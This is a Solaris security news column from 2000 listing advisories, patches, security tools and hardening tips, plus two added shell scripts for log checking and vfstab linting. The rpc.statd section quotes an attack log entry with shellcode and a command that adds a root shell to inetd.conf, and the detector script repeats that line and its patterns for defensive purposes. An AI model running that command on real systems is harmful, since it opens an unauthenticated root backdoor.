By Seán Boran (sean AT boran.com) for SecurityPortal
Contents:
Advisories and Security Bulletins
News
Security Tools
Mailing Lists
Tip of the week #0, #1, #2, #3, #4
A bug surfaced in PGP regarding the use of ADKs (additional decryption keys, a key-recovery mechanism): PGP honoured an ADK packet that an attacker had appended to someone else's public key, even though that packet was not covered by the key's self-signature, so mail encrypted to the tampered key was silently also encrypted to the attacker's key. It affects the PGP releases that implement ADKs (5.5.x through 6.5.3, per CERT CA-2000-18), but not older UNIX versions such as 2.6.3i and 5.0i, nor GnuPG 1.0.1, none of which implement ADKs.
See also:
http://www.cert.org/advisories/CA-2000-18.html
http://cryptome.org/pgp-badbug.htm
http://www.securityfocus.com/vdb/bottom.html?vid=1606
Bulletin Number: #00197 Java Web Server
Sun announces the release of patches for Java Web Server 2.0 and 1.1.3 which relate to a vulnerability with the administration module and recommends that they be installed immediately on systems running Java Web Server.
Patches are available at:
http://java.sun.com/products/java-server/jws113patch3.html
http://java.sun.com/products/java-server/jws20patch3.html
CERT announced Advisory CA-2000-17 "Input Validation Problem in rpc.statd":
The rpc.statd program passes user-supplied data to the syslog() function as a format string. If there is no input validation of this string, a malicious user can inject machine code to be executed with the privileges of the rpc.statd process, typically root.
The advisory lists only Linux distributions as affected and does not say whether Solaris is vulnerable, so it is worth checking the logs for entries like the following one, as recorded by Linux rpc.statd. Note the "hostname" filled with shellcode and the trailing shell command that adds a root shell to inetd.conf:
rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e203a272f.............0000000000000bffff707<90><90>.............<90>K^<89>v<83> <8D>^( <83> <89>^<83> <8D>^.<83> <83> <83>#<89>^ 1<83> <88>F'<88>F*<83> <88>F<89>F+, <89><8D>N<8D>V<80>1<89>@<80>/bin /sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
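As an added example (not part of the original column, nor of the CERT advisory), the following Bourne shell script runs the log check suggested above over constructed syslog lines in the format of the entry quoted. The classification rules (shell command text, caret or <hex> notation for non-printable bytes, runs of eight hex digits) are this example's own heuristics, and the sample log is made up for the purpose.

```sh
#!/bin/sh
# Added example (not from the original column): scan syslog text for rpc.statd
# "SM_MON request for hostname containing '/'" entries whose hostname field
# carries a format-string/shellcode payload instead of a host name.
# Findings, strongest evidence first:
#   shell-command : "/bin/sh", "inetd.conf", "killall" or "/etc/" in the payload
#   control-bytes : caret (^X) or <hex> notation for non-printable bytes
#   hex-words     : runs of 8 hex digits (stack addresses / return-address sleds)

# Constructed sample log (not a real capture). Line 1 mimics the entry quoted
# above, line 2 is benign statd chatter, line 3 is a NOP sled with no command,
# line 4 is a hostname that merely contains a slash and must not be flagged.
sample_log() {
    cat <<'EOF'
Aug 17 02:11:05 ns1 rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 <90><90>/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
Aug 17 02:12:00 ns1 rpc.statd[410]: SM_NOTIFY from client.example.com
Aug 17 02:13:22 ns1 rpc.statd[410]: SM_MON request for hostname containing '/': .......<90><90><90><90>K^<89>v<83>
Aug 17 02:14:09 ns1 rpc.statd[410]: SM_MON request for hostname containing '/': host/typo.example.com
EOF
}

# statd_suspicious LOGTEXT
# Prints "<pid>:<reason>:<first 40 bytes of payload>" for each suspicious entry.
# Exit status 0 if anything was flagged, 1 if the log looks clean.
statd_suspicious() {
    printf '%s\n' "$1" | awk '
        /rpc\.statd\[[0-9]+\]: SM_MON request for hostname containing/ {
            pid = $0; sub(/.*rpc\.statd\[/, "", pid); sub(/\].*/, "", pid)
            # payload = everything after the quoted character and the colon
            payload = $0; sub(/.*containing [^:]*: */, "", payload)
            reason = ""
            if (payload ~ /\/bin\/sh|inetd\.conf|killall|\/etc\//)
                reason = "shell-command"
            else if (payload ~ /<[0-9a-fA-F][0-9a-fA-F]>|\^[@A-Z]/)
                reason = "control-bytes"
            else if (payload ~ /[0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f]/)
                reason = "hex-words"
            if (reason != "") { print pid ":" reason ":" substr(payload, 1, 40); found = 1 }
        }
        END { exit found ? 0 : 1 }'
}

# Example run: two findings (shell-command, control-bytes) for the sample.
statd_suspicious "$(sample_log)" || :
```

On a real host, feed it the messages file (`statd_suspicious "$(cat /var/adm/messages)"` on Solaris, `/var/log/messages` on Linux); a non-zero exit means nothing was flagged, which makes it easy to call from a nightly cron job.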
Relevant links:
http://www.cert.org/advisories/CA-2000-17.html
http://www.securityfocus.com/bid/1480
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666
Sun bulletin #00196 announces a new version of AnswerBook2 and patches for security flaws in the http server bundled with AnswerBook2. Versions of that http server prior to 1.4.2 have weaknesses that could lead to remote exploits. Two actions are needed to fix this:
- Update Answerbook to v1.4.2 or later
- Install patches; for the SPARC architecture 110011-02 or Intel x86 110012-02.
Sun bulletin #00195 announces patches for the libprint.so.2 and /usr/lib/lp/bin/netpr vulnerabilities presented on Bugtraq in June. The vulnerability may allow a local user to gain root access. The patches needed are:
SunOS 5.8 109320-01 SunOS 5.8_x86 109321-01
SunOS 5.7 107115-05 SunOS 5.7_x86 107115-05
SunOS 5.6 106235-06 SunOS 5.6_x86 106236-06
2000-08-22: Sun Java Web Server Web Admin / Bulletin Board Vulnerability
The severe problems noted a few weeks ago now have patches, see also the Sun bulletin above.
2000-08-08: Solaris AnswerBook2 Administration Interface Access Vulnerability
2000-08-07: Solaris AnswerBook2 Remote Command Execution Vulnerability
2000-08-29: GWScripts News Publisher author.file Write Vulnerability
2000-08-29: Helix Code "go-gnome" /tmp Symlink Vulnerability
2000-08-28: Kerberos KDC Spoofing Vulnerability
2000-08-25: Multiple Vendor mgetty Symbolic Link Traversal Vulnerability
2000-08-23: CGI Script Center Account Manager LITE / PRO Administrative Password Alteration Vulnerability
Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager.
2000-08-23: CGI Script Center Subscribe Me LITE Administrative Password Alteration Vulnerability
Fix: update to new version from http://www.cgiscriptcenter.com/subscribe/
2000-08-22: ISS RealSecure 3.2.x Fragmented SYN Packets DoS Vulnerability
On Solaris, the process crashes, all detection stops, and a report is generated to the console. Also, on Solaris it is possible to crash the process with a flood of unfragmented packets if certain flags (in addition to SYN) are set.
2000-08-20: UMN Gopherd 2.x Halidate Function Buffer Overflow Vulnerability
2000-08-17: Netwin Netauth Directory Traversal Vulnerability
2000-08-15: BEA Weblogic Proxy Multiple Buffer Overflow Vulnerabilities
Fix: Upgrade to service pack 5.
2000-08-14: ntop -w Buffer Overflow Vulnerability
Workaround: remove the setuid bit and don't execute ntop as root.
2000-08-08: Multiple Vendor mopd Buffer Overflow Vulnerability
2000-08-08: Multiple Vendor mopd User Inputted Data Used as Format String Vulnerability
2000-08-07: SuidPerl Mail Shell Escape Vulnerability
If you use Perl for SUID scripts, an upgrade to the next release of perl will be needed. For now, removing the SUID bit from suidperl/sperl is advised.
2000-08-04: PCCS Mysql Database Admin Tool Username/Password Exposure Vulnerability
2000-08-03: Netscape Listening Socket Vulnerability
2000-08-03: Netscape Communicator URL Read Vulnerability
All versions of Netscape Navigator/Communicator up to 4.74 are vulnerable to a Java bug that enables a hostile web site to start a server process on the client, giving it full access to the client's files.
2000-08-02: Check Point Firewall-1 Unauthorized RSH/REXEC Connection Vulnerability
2000-08-02: Linux ntop Unauthorized File Retrieval Vulnerability
2000-08-01: GNU Mailman Local Format String Stack Overwrite Vulnerability
2000-07-31: Weblogic SSIServlet Show Code Vulnerability
2000-07-31: Weblogic FileServlet Show Code Vulnerability
2000-07-30: Bajie Webserver Absolute Path Disclosure Vulnerability
2000-07-30: Bajie Webserver File Reading Vulnerability
2000-07-28: CVS Client Server-Instructed File Create Vulnerability
2000-07-28: CVS Checkin.prog Binary Execution Vulnerability
2000-07-27: OpenLDAP 'ud' Group Writable Vulnerability
Infosec Outlook August 2000 Volume 1, Issue 5 is a joint monthly publication of the Information Technology Association of America (ITAA) and CERT. In this issue:
How the FBI Investigates Computer Crime
Infosec Experts: Carnivore Bite Too Big?
Finger Pointing on Cyber Liability
The IDS Life Cycle
How to perform a secure remote backup over an insecure network, by Aviel D. Rubin
Backups: you might be able to steal data for only a six-pack of beer... Backup tools and their encryption facilities are examined.
Stupid, Stupid Protocols: Telnet, FTP, rsh/rcp/rlogin, by Jay Beale
More on SSH, in particular using RSA auth for users.
Interview With Jean Chouanard, YASSP Lead Developer, by Seán Boran
Audits, Assessments & Tests (Oh, My), by Al Berg
On the surface, all vulnerability assessment scanners perform essentially the same way. Here's how to decide which one, if any, is right for your requirements (Part 2 of 4).
This is a well-written article for anyone who has to review Network Security Scanners.
Authentication: Patterns of Trust, by Rick Smith
There are plenty of options for user authentication, but none is a "one-size-fits-all" solution. With so many available technologies, how do you select the right one for your organization's needs?
Access Control: Beyond Firewalls, by Stephen D. Reed
In most organizations, firewalls are now a commodity: everyone has at least one. In the future, access controls will need to become more granular, all the way down to the data level.
The truth about security, by Jascon Fink
Meet PAM: Authenticating Users on an Open Source System, by Scott Mann
Pluggable authentication modules (PAM) were originally developed by Sun Microsystems and released as an undocumented feature in Solaris 2.3. Since then, Sun has done little with PAM, compared to the open source community, and most specifically, the Linux community. In this article, we will explore the general role of Linux-PAM, its components, configuration and a few general examples of its use.
Although the focus is on Linux, this is the best article on PAM that I've seen so far.
Role Based Access Control, by Hal Flynn
In an attempt to add a finer grain of control to privileges, Sun implemented the Role Based Access Control system in Solaris 8. As a clever solution to a large problem, Sun has implemented a facility that allows the customizing of privileges for each individual user. The distribution of power can now allow users access to resources previously not possible without giving them root access to the system. Hal Flynn sets forth background information for a series of articles discussing this relatively new technology, which will be useful to users at a wide variety of levels who are looking into implementing RBAC on their systems.
The fields in /etc/group, /etc/passwd and /etc/shadow are explained along with ACLs. The actual discussion of RBAC is planned for next week.
Introduction to IP Filter Part 2, by Jeremy Rauch
Too often, machines are compromised due to services running that are unneeded, or unnoticed. Many times, services are started that an administrator thought they had disabled, or a service is accidentally re-enabled during patching. There is no substitute for properly locking down a machine, but sometimes things slip through the cracks.
IP Filter can be a fairly complex and intimidating piece of software for people to configure properly. In this article, the second of two parts, we'll talk about using IP NAT, as well as applying some more "advanced" features of IP Filter to building a firewall.
Solaris Data Encryption Supplemental CD Download delivery
The software previously contained on the Solaris Data Encryption Supplemental CD (SOLZ9-080N9999) is being repriced from $100 to no charge (via web download) and will now be offered via download to all countries except Russia, Israel and nations embargoed by the U.S. government and Burma as per Sun policy.
This sounds like exactly what International customers have been waiting for! I was unable to find out how to download it though, I'll follow up next week.
Secure Enterprise Computing with the Solaris 8 Operating Environment
This whitepaper presents some of Solaris 8's security features:
The IPsec implementation (for VPNs), noting for instance that only manual key exchange is implemented, and that international users get only 56-bit DES for payload encryption.
Strong authentication: Pluggable Authentication Module - PAM, Smart card, Kerberos client/server.
Role-Based Access Control: Privileges that are managed with RBAC include serial port, file, log, and printer management, user login control, and system shutdown... Role-based access control is implemented using roles and attributes; once a user is logged in, they can assume roles that have been made available to them through the use of role-aware shells.
Access Control Lists
A list of Sun's security whitepapers is available at:
Trusted Solaris 7 FAQ
http://www.sun.com/software/white-papers/#security
The following 'blueprints' from Sun may be of interest; updates are expected in the coming months:
Solaris Operating Environment Security: Discusses how to enhance system and network service security in Solaris.
Solaris Operating Environment Network Settings for Security: Discusses the many low-level network options available within Solaris and their effect on security.
Solaris Minimization for Security: A Simple, Reproducible and Secure Application Installation Methodology: Discusses OS minimization as a technique for reducing system vulnerabilities; a simple method for duplicating these installations on large numbers of servers is also introduced
JumpStart Architecture and Security Scripts for the Solaris Operating Environment Part 1: This article is part one of a three part series presenting the JumpStart Architecture and Security Scripts tool (Toolkit) for Solaris. The Toolkit is a set of scripts which automatically harden and minimize Solaris Operating Environment systems. The modifications made are based on the recommendations made in the previously published Sun blueprints online security articles.
PatchPro Expert: Patch Automation for Sun Storage
An Introduction To Live Upgrade
Running logcheck, the logfile auditing software for Unix (see also my improved logcheck.sh)
PAM - Pluggable Authentication Modules, by Kurt Seifried
Snort
08292k.rules released. This file has been broken out into sections for each rule type, rather than the way it used to ship.
Snort Survey Database Online. If you use snort, take a moment to fill this out.
snortrpt.pl generates an IDS report for those using the Win32 port of snort. It extracts alerts from the EventLog, and then performs a quick stealth scan and os ID scan of the 'offending' IP addresses, using eEye Security's nmapNT.
A new release of dupl.pl is out, which allows merging of rules files without duplicating rules.
Snort RPMs for snort, Solaris packages and a chroot'ed snort are in the files section.
The snort2bb.pl program is designed to monitor snort output and send the results to the Big Brother network monitor
snortstart 0.14 by zas, is a bash script to install, start and stop snort in a chroot jail under unprivileged user and group. Not tested yet.
07272k.rules has been released
Snort Installation and Basic Usage Part II
TCT (The Coroner's Toolkit)
An Introduction to TCT is a brief documentation of TCT.
v1.02 released. This patch fixes a few bugs in the mactime utility, and makes the ils and ils2mac utilities more useful for exploring the inodes of deleted files.
Computer Forensics Column, By Dan Farmer and Wietse Venema
I had problems with v1.01 trying to analyse unmounted cdroms and hanging, haven't tried v1.02 yet.
v1.01 released. TCT is a collection of programs for a post-mortem analysis of a UNIX/Linux system after a break-in.
Forensic Computer Analysis: An Introduction, By Dan Farmer and Wietse Venema
SAINT - v 2.1.3 by World Wide Digital Security, Inc., is a security assessment tool based on Satan. New in this version:
Check for IRIX telnetd format string vulnerability
Check for buffer overflow in gopher
Check for vulnerability in SUN AnswerBook2 (detected only at heavy-plus scanning level)
Check for wais.pl
Check for PCCS MySQL Database Admin Tool (dbconnect.inc)
Modified heavy scan to avoid crashing PC Duo (thanks to Daniel Curry)
Some documents on Saint:
Vulnerabilities detected by Saint, CVEs detected by SAINT.
Nessus 1.0.4 released.
Ngrep 1.38 released.
Nmap
Intrusion Detection Level Analysis of Nmap and Queso, by Toby Miller
2.54BETA2 is out; the last stable release is Nmap 2.53.
SSH
Secure FTP 0.9.6 by Brian Wellington, implements a file transfer protocol using ssh/rsh as the transport mechanism.
Commercial SSH2 has been upgraded to 2.30.
OpenCA v0.6 pre-release available.
FreeVeracity: New Free Intrusion Detection Tool for Free Platforms - FreeVeracity is a general-purpose data integrity tool for free platforms (e.g. GNU/Linux, FreeBSD, NetBSD, OpenBSD) that uses cryptographic hashes to detect changes in files. FreeVeracity can be deployed in a wide variety of applications including network intrusion detection and firewall monitoring. By installing FreeVeracity integrity servers on your computers, you can actively monitor the integrity of your entire network.
The bad news is, it's not free for Solaris. It was not clear how much it costs for Solaris either.
Talisker's Intrusion Detection Systems is an interesting site with a well laid out list of IDS tools and links to reviews, coupled with advice and amusing cartoons.
html-trap.procmail v1.117 released.
Procmail snippet to defang active-content HTML tags to protect those people foolish enough to read their mail from a web browser or HTML-enabled mail client. Also mangles the attachment name on executable attachments to prevent attacks, at the cost of not being able to run programs from within your mail client - which you shouldn't do anyway. Also protects against excessively long filenames in attachments, which can cause nasty things to happen in some clients, and excessively long MIME headers, which may crash or allow exploits of some clients.
Automated Password Generator (APG) v1.0.3
Can run in standalone or client/server mode
Built-in ANSI X9.17 RNG (Random Number Generator)
Built-in password quality checking system
Two Password Generation Algorithms, Pronounceable and Random.
Configurable password length and number of passwords generated
Ability to initialize RNG with user string
Ability to log password generation requests for network version
Ability to control APG service access using tcpd
Ability to use the password generation service from any type of box (Mac, WinXX, etc.) that is connected to the network
Ability to restrict remote users to the allowed types of password generation
Whisker 1.4 by rain forest puppy, is a CGI vulnerability scanner. It is scriptable and has many features, such as querying for the server type and basing scans on the information gathered (i.e. distinguishing between IIS and Apache web servers).
Claymore 0.2 by Sam Carter, is an intrusion detection, and integrity monitoring system. It reads in a list of files stored in flat ASCII, and uses md5sum to check their integrity against that recorded earlier in a database. If the database is placed on a read-only medium such as a write-protected floppy, then it should provide an infallible record against remotely installed trojan horses.
Note: I've not tried this, but it sounds like a Tripwire alternative.
SAINT - v 2.1.2 by World Wide Digital Security, Inc., is a security assessment tool based on SATAN. .... This release adds vulnerability checks for setproctitle vulnerability in ftpd (added checks for HP-UX, OpenBSD, and ProFTP), Linux statd format string vulnerability, Big Brother (two vulnerabilities), Apache::ASP (source.asp), Poll It, guestbook.cgi, Excite for Web Servers, OmniHTTPD (imagemap.exe), Mini SQL (w3-msql), and the AltaVista search engine.
Note: 'Sara', mentioned last week, is a Saint derivative. It is not clear to me which of the two is the most useful, or whether it is intended to merge the best of both these Satan derivatives at a later stage. Sara seemed slow.
nPULSE 0.2 by Dr. Steven Horsburgh
nPULSE is a web-based network monitoring package for Unix-like operating systems. It can quickly monitor tens, hundreds, even thousands of sites/devices at a time on multiple ports. nPULSE is written in Perl and comes with its own mini web server for extra security.
Automated Password Generator (APG) 1.0.4 by Adel I. Mirzazhanov
APG (Automated Password Generator) is a tool set for random password generation.
Samhain 0.9.2, by Rainer Wichmann
Samhain is a file system integrity checker that can optionally be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, tamper-resistant log file, and syslog) are available. Samhain has been tested on Linux, AIX 4.1, HP-UX 10.20, Unixware 7.1.0, and Solaris 2.6.
XOR Cipher Analyzer 0.2 by Marvin,
XOR-analyze is a program for cryptanalyzing (breaking) one of the most easily-breakable ciphers. It works with variable key lengths and includes an encryption/decryption program.
MIME Defanger 0.4 by David F. Skoll
MIME Defanger is an e-mail filter program which works with Sendmail 8.10. MIME Defanger filters all e-mail messages sent via SMTP. MIME Defanger splits multi-part MIME messages into their components and potentially deletes or modifies the various parts. It then reassembles the parts back into an e-mail message and sends it on its way. In this release the mail filter can more reliably determine attachment names, and there is extra logging via syslog.
NetSaint 0.0.6b5 beta by Ethan Galstad
NetSaint is a program that will monitor hosts and services on your network. It has the ability to email or page you when a problem arises and when a problem is resolved. Several CGI programs are included in order to allow you to view the current service status, problem history, notification history, and log file via the web.
Cryptix 3 is a cleanroom implementation of Sun's Java Cryptography Extensions (JCE) version 1.1. In addition to that it contains the Cryptix Provider which delivers a wide range of algorithms and support for PGP 2.x. Cryptix 3 runs on both JDK 1.1 and JDK 1.2 (Java 2).
This really is a useful toolkit, I've used and can recommend it.
08/31/00 Limiting write access to a port
08/30/00 nisd_resolv issues
08/21/00 Promiscuous flag under Solaris.
08/21/00 TCP Wrapper configuration
08/20/00 SKey on Solaris?
08/18/00 Issues with backing up with ufsdump
08/17/00 Promiscuous flag under Solaris
08/17/00 statd log file entry
08/17/00 Shell Q
08/17/00 Proposed Solaris Rootshell FAQ
08/17/00 FOCUS-SUN Digest - 15 Aug 2000 to 16 Aug 2000 (#2000-108)
08/15/00 vipw (was Re: Shell Q)
08/15/00 FW: Dan & Wietse's Forensics Tools released
08/14/00 anti-virus software
08/14/00 Shell Q
08/11/00 password history for Solaris
08/13/00 hardware address Thread1, Thread2
08/12/00 in.dhcpd
08/11/00 password history for Solaris
08/10/00 Solaris FTPd Capabilities
08/09/00 Syslogd accepting messages from everyone?
08/07/00 recently on bugtraq... [Re: Identifying SUN Solaris Machines using ICMP Address Mask Requests with a little twist] Thread1, Thread2, Thread3
08/07/00 perl -vs- firewalls (was: Dan & Wietse's Forensics Tools released) Thread1, Thread2, Thread3, Thread4, Thread5
08/06/00 sendmail error message question
08/05/00 Quick sendmail question
08/04/00 Trusted solaris
08/04/00 Shell script to binary compiler
08/03/00 Installing apps/utils as usr or root
08/02/00 Sun Security Bulletin #00195 (fwd)
08/02/00 FW: Dan & Wietse's Forensics Tools released
08/01/00 Syslogd accepting messages from everyone?
07/31/00 Solaris8 eye opener
07/28/00 sendmail Thread1 Thread2 Thread3
07/28/00 Root gid change to zero, and SMTP uid of 0, gid of 0: Thread1 Thread2 Thread3 Thread4 Thread5 Thread6
07/27/00 Potential problem (and solution) with FW-1 SP2 upgrades
07/25/00 SUNWski
License approval issues are holding up the next beta. Drafts of the post install doc, ToDo and faq have been updated. Significant work on reviewing, improving and documenting "tocsin" for inclusion in Yassp. A bug was noted in /etc/hosts.allow. Discussions on ideas to include new binaries for md5 and tocsin, automated patch scripts and disabling SUID files.
Discussion threads:
tocsin package ready
tocsin update
tocsin tests
Additional binaries for yassp
email archives
pwd: cannot determine current directory!
FW-1 on Sol 7
tocsin manual page
hosts.allow-Dist
tocsin package pref q
tocsin
SUID files
Portscan detection
BIND variable in yassp.conf
md5
package / binary and reverse map
Re: Only allow root to access some files?
RE: Reg's patch scripts
Re: Only allow root to access some files?
Post install doc #4
Re: Yassp Post installation doc (email server)
Questions on clean_passwd
Mods to /etc/profile
Re: install yet another package
Re: Yassp Post installation doc update #2
Re: packaging Q
Re: Yassp Post installation doc update #3
Reg's patch scripts
Problems running CDE as non root user?
Reg's patch scripts
Yassp Post installation doc update #3
Problems running CDE as non root user?
packaging Q
nsyslog or ssyslog?
site editing
Yassp Post installation doc update #2
Improving "daily"
Yassp Post installation doc update
Re: Beta#11 feedback
See also: Main site, DL archive, Interview With Jean Chouanard, Draft dev. doc.
Advanced Research Corporation are providing free updates to Satan and Tiger, two old but useful auditing tools.
The Security Auditor's Research Assistant (SARA) is an updated version of the venerable SATAN network auditing tool:
- CVE standards support
- Enterprise-level search module
- Standalone or daemon mode
- Free-use open license
- Updated twice a month
- User extension support
Satan was a useful tool, with a good user interface, but it was not updated except for the Saint derivative. Bob Todd, the SAINT author, has been working on SARA since 1999. Some useful features in SARA include integrated support for nmap, samba and DDoS tools. A report writer for pretty summary reports is also available.
Tests show that it works on Solaris 8 and OpenBSD.
- It needs a web browser, but lynx is acceptable as well as the GUI browsers (configured in config/paths.pl). For Netscape I had to change the '.pl' handling as noted in the FAQ.
- I did have frequent errors like "Initialization in progress, SARA is initializing, please try again later" when using lynx.
- The 'html/docs' subdirectory contains detailed HTML documentation, it's worth a read first.
- Start with the '-n' option to integrate nmap.
- Do NOT scan production systems unless you know exactly what you are doing, Sara (like Satan before it) can cause servers to have hung sessions etc. especially with older (buggier) OS's.
Problems:
- Sara still reports a 'red' error for NFS read-only exports, something that I never agreed with in Satan. It should be 'yellow'.
- 'Email relay problem' does not actually check if relaying works, just indicates that sendmail is present.
- 'rstatd' suffers from the same problem.
- It is slow
TARA is an update of the 1994 'Tiger scripts' for host-based security auditing.
Since 'tiger' has not been updated since 1994, there were numerous changes made to the 'systems' directories. Output was streamlined to provide a more readable report file. Also, minor bugs in the 'scripts' directory were corrected. TARA was tested under Red Hat Version 5.x, 6.x, SGI IRIX 5.3, 6.x, and SunOS 5.x.
This is also a useful update. It has a '-H' option to produce HTML output. It's worth taking time to customise tigerrc to your needs before running it.
Problem: no signature DBs are available for newer Solaris versions.
Francisco Mancardi from U&R Consultores [fman@uyr.com.ar], who gave us the 'saveit' script five weeks back, has written scripts to make it easier to read Sun's C2 (SunShield BSM) audit logs. The scripts and files described here can be downloaded. First we'll briefly run through setting up C2 (SunShield BSM) audit logs.
What is SunShield BSM?
Sun delivers a "C2" level auditing system for both SunOS (SunShield) and Solaris (SunShield BSM); it is bundled with Solaris 2. BSM allows the actions of specific users to be recorded and written to an audit file. However, the auditing is at the system-call level, meaning that simple user actions may generate huge logs, and performance is also affected. The standard analysis tools praudit and auditreduce offer no high-level analysis of audit trails. Applications may also write to the audit trail.
Reference documentation: "SunShield Basic Security Module Guide" (Standard Solaris 2.x documentation). Man pages: audit(1m), audit_startup(1m), audit_warn(1m), auditconfig(1m), auditreduce(1m), bsmconv(1m).
Enabling and configuring SunShield BSM:
Install the audit2info scripts:
Try out audit2info:
First, produce an ASCII file on C2 auditing activity :
cd /opt/audit;
auditreduce | praudit > audit-data.txt
We can now analyse this output in different ways using the "audit2info" script (links are provided to sample results).
Let's make the output from auditreduce | praudit above more readable:
./audit2info audit-data.txt > outfile
Show only activity concerning one username:
./audit2info -u bill audit-data.txt > outfile
Show only login/logout activity:
./audit2info -l ok audit-data.txt > outfile
Show only login failure activity:
./audit2info -l ko audit-data.txt > outfile
Show the complete output from auditreduce | praudit, but filter out records that have fields containing a string listed in the filter file (default "filtro_audit"):
./audit2info -f default audit-data.txt > outfile
The above options can be combined as desired.
Notes using SunShield BSM:
Implementing C2 Auditing in the Solaris Environment, by Kevin Wenchel and Stephen Michaels
http://www.sysadminmag.com/supplement/913c2.shtml
Disk mounting (vfstab options):
Several options can be set to improve the security and robustness of filesystems when they are mounted. Run the mount command to check that the filesystem options are actually in effect.
Mount option | OS | Description | When to use it |
nosuid | 2.x | Disables SUID programs, but also disables device special files! | /var, /home or data disks where no SUID programs or devices are needed (so not where chroot environments live, since they need device nodes). /tmp won't work either, unless it is on disk. |
logging | 2.7 or later | Keeps a transaction log within the mounted partition. The advantage is an almost instantaneous filesystem check, which may otherwise take a considerable while with larger hard disks, e.g. 18 GB. The disadvantage is the additional time spent writing the transaction log. | /usr /opt /home. Recommended for all file systems except root (if Veritas VxVM is used), or where lots of file accesses are expected. |
noatime | 2.7 or later | Mounts the file system without updating inode access times at each access to any file. This significantly speeds up services like web caches or news servers, which do a lot of file I/O on small files. | /var or any partition where lots of file accesses are expected (web cache or news partitions). |
size=100m | 2.5.1 or later | Allows /tmp to use only 100 MB of swap space. The value could be set to, say, 30% of swap space. | /tmp |
ro | 2.x | Read-only. Mounting filesystems read-only provides only limited protection against Trojans/attackers (if they get root, they can remount read-write), but it saves time fsck'ing when shutting down, can improve performance (access times don't need to be updated) and can prevent the sysadmin from making mistakes or help detect them (accidentally deleting files etc.). | Mounting read-only is a major argument for maintaining separate file systems for /usr or /opt. Note that to mount /usr read-only, /usr/local often needs to be on a different partition. |
Be very careful when editing vfstab, e.g. an error on the / or /usr lines can render the system unbootable! (If this happens, boot from cdrom in single user mode, mount the problem disk, correct vfstab and reboot). Some examples of vfstab entries are:
A simple server with only a root and /var partition, running Solaris 2.8:
fd - /dev/fd fd - no -
/proc - /proc proc - no -
/dev/dsk/c0t3d0s1 - - swap - no -
/dev/dsk/c0t3d0s0 /dev/rdsk/c0t3d0s0 / ufs 1 no logging
/dev/dsk/c0t3d0s7 /dev/rdsk/c0t3d0s7 /var ufs 1 no logging,nosuid,noatime
swap - /tmp tmpfs - yes size=100m
and on a larger server:
fd - /dev/fd fd - no -
/proc - /proc proc - no -
swap - /tmp tmpfs - yes size=200M
/dev/dsk/c0t8d0s0 /dev/rdsk/c0t8d0s0 / ufs 1 no logging
/dev/dsk/c0t8d0s1 - - swap - no -
/dev/dsk/c0t8d0s4 /dev/rdsk/c0t8d0s4 /usr ufs 1 no logging
/dev/dsk/c0t8d0s6 /dev/rdsk/c0t8d0s6 /var ufs 1 no nosuid,noatime,logging
/dev/dsk/c0t8d0s5 /dev/rdsk/c0t8d0s5 /opt ufs 2 yes logging
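Since an error in vfstab is easy to make and expensive to discover, here is an added example (not from the original column) of a Bourne shell lint that applies the rules from the table above to vfstab-format text before you reboot: every ufs file system should carry "logging", /var and home/data partitions should be "nosuid", and a tmpfs /tmp should have a "size=" cap. The weak and corrected tables it runs on are constructed for the example; the choice of which mount points must be nosuid is this example's own and should be adapted to the host.

```sh
#!/bin/sh
# Added example, not part of the original column: a small lint for vfstab-format
# text that applies the mount-option table above. Rules checked:
#   - every ufs file system has "logging" (Solaris 7 or later)
#   - /var, /home and /export* are mounted "nosuid"  (example's own list)
#   - a tmpfs /tmp has a "size=" cap
# vfstab columns: device, fsck device, mount point, FS type, fsck pass,
# mount-at-boot, options ("-" when none).

# Constructed vfstab (no real host): /var lacks nosuid, /opt lacks logging,
# /tmp has no size cap. Comment lines start with '#'.
weak_vfstab() {
    cat <<'EOF'
#device         device          mount   FS      fsck    mount   mount
#to mount       to fsck         point   type    pass    at boot options
fd              -               /dev/fd fd      -       no      -
/proc           -               /proc   proc    -       no      -
/dev/dsk/c0t0d0s1 -             -       swap    -       no      -
/dev/dsk/c0t0d0s0 /dev/rdsk/c0t0d0s0 /  ufs     1       no      logging
/dev/dsk/c0t0d0s6 /dev/rdsk/c0t0d0s6 /var ufs   1       no      logging,noatime
/dev/dsk/c0t0d0s5 /dev/rdsk/c0t0d0s5 /opt ufs   2       yes     -
swap            -               /tmp    tmpfs   -       yes     -
EOF
}

# The same layout with the options the table recommends.
fixed_vfstab() {
    cat <<'EOF'
fd              -               /dev/fd fd      -       no      -
/proc           -               /proc   proc    -       no      -
/dev/dsk/c0t0d0s1 -             -       swap    -       no      -
/dev/dsk/c0t0d0s0 /dev/rdsk/c0t0d0s0 /  ufs     1       no      logging
/dev/dsk/c0t0d0s6 /dev/rdsk/c0t0d0s6 /var ufs   1       no      logging,nosuid,noatime
/dev/dsk/c0t0d0s5 /dev/rdsk/c0t0d0s5 /opt ufs   2       yes     logging
swap            -               /tmp    tmpfs   -       yes     size=100m
EOF
}

# has_opt OPTS NAME: true if the comma-separated option list contains NAME
# or NAME=value.
has_opt() {
    case ",$1," in
        *",$2,"*|*",$2="*) return 0 ;;
        *) return 1 ;;
    esac
}

# vfstab_lint VFSTAB_TEXT: prints one "<mount point>: <problem>" line per finding.
vfstab_lint() {
    printf '%s\n' "$1" | while read -r dev fsckdev mnt fstype pass boot opts; do
        case "$dev" in ''|'#'*) continue ;; esac      # skip blank and comment lines
        case "$fstype" in
            ufs)
                has_opt "$opts" logging || printf '%s: ufs without logging\n' "$mnt"
                case "$mnt" in
                    /var|/home|/export*)
                        has_opt "$opts" nosuid || printf '%s: should be nosuid\n' "$mnt" ;;
                esac ;;
            tmpfs)
                has_opt "$opts" size || printf '%s: tmpfs without a size= cap\n' "$mnt" ;;
        esac
    done
}

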